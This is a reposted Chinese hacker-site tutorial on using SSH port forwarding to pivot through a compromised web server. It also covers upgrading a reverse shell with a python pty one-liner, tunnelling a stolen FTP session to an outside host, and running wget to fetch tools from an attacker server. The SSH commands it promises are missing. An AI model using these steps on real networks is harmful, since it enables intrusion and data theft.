深入SSH隧道(depth of ssh Tunnel) www.hxhack.com 阅读:109 时间:2009-9-3 1:10:39 整理:华夏黑盟 ------------------------------------------------------------------ |
在渗透测试过程中,经常遇到如下情形,内部网络主机通过路由器或者安全设备做了访问控制,无法通过互联网直接访问本地开放的服务,Windows方 面,国内通常选择Lcx.exe来进行端口转发,在应用方面大多数人也会选择reDuh来进行端口转发,而*nix却很少人用系统自带的ssh、 iptables自身来处理此类问题。 SSH的三个端口转发命令: -f Fork into background after authentication. -p port Connect to this port. Server must be on the same port. -L port:host:hostport -R port:host:hostport -D port -C Enable compression. -N Do not execute a shell or command. -g Allow remote hosts to connect to forwarded ports. 如果想要了解更多关于SSH的细节,可以 man ssh ,或参照ssh的DOC. 实例: 骇客A通过利用80端口开放服务的WEB脚本漏洞,成功继承到GBOSS_WEB的httpd权限,然后通过perl或者其它语言创建SOCKET获得一 个远程sh shell。由于back回来的shell可能不稳定,或者使用起来不方便,可以采用SSH建立一个隧道,将GBOSS_WEB服务器上的22端口映射至 骇客的本机上(本文章用于演示的骇客机为0x.cn); 通过得到的sh shell,执行 $python -c 'import pty; pty.spawn("/bin/sh")' 获得一个ttyshell(因为ssh想要tty的支持),然后通过如下命令,映射GBOSS_WEB服务器的22端口至202.65.208.142的44端口; 骇客A通过利用操作系统系统提升权限至ROOT,再继续渗透过程中,发现内网还存在另外一台名称为GBOSS_APP的服务器。 骇客通过嗅探获取了GBOSS_APP服务器的FTP信息,GBOSS_APP服务器FTP保存有RISUN企业的核心数据,由于数据量庞大,需要FTP续传功能,可通过SSH映射GBOSS_APP的21端口至0x.cn的2121端口; 当骇客成功root掉内网中另一网段中的服务器BILL_APP时,需要从外网下载一些工具,由于内部访问控制策略,BILL_APP无法连接网,此时可 以通过映射外网服务器0x.cn的80端口至GBOSS_WEB的8888端口,然后通过GBOSS_WEB建立的隧道,下载所需工具。 通过建立隧道后,在BILL_APP上执行 wget http://10.168.0.10:8888/thepl 等同于访问http://202.65.208.142/thepl 本文详细的概述了如何建立隧道的过程,以及相关参数的使用方法,各位懂的高手可以直接飘过。 |
2010年6月10日星期四
深入SSH隧道(depth of ssh Tunnel) (转)
转:http://www.hx95.com/Article/Tech/200909/29501.htm
订阅:
博文评论 (Atom)
没有评论:
发表评论